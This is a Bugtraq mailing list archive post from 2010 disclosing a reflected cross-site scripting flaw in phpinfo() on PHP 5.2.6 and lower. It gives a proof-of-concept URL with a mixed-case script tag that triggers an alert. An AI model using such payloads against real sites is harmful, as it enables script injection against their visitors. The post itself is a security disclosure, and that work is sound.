Bugtraq mailing list archives

phpinfo() XSS Vulnerability

From: info () securitylab ir
Date: 6 Mar 2010 11:03:45 -0000

###################################################################
# Securitylab.ir
#################################################################
# Note: The above code in php 5.2.6 and lower test is successful
#################################################################
Vulnerability:
http://site.com/phpinfo.php?+<ScRipT>alert(0111001101100101011000110111010101110010011010010111010001111001);</sCrIpT>+
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran () yahoo com
###################################################################

Current thread:

phpinfo() XSS Vulnerability info (Mar 08)
- Re: phpinfo() XSS Vulnerability Salvatore Fresta aka Drosophila (Mar 08)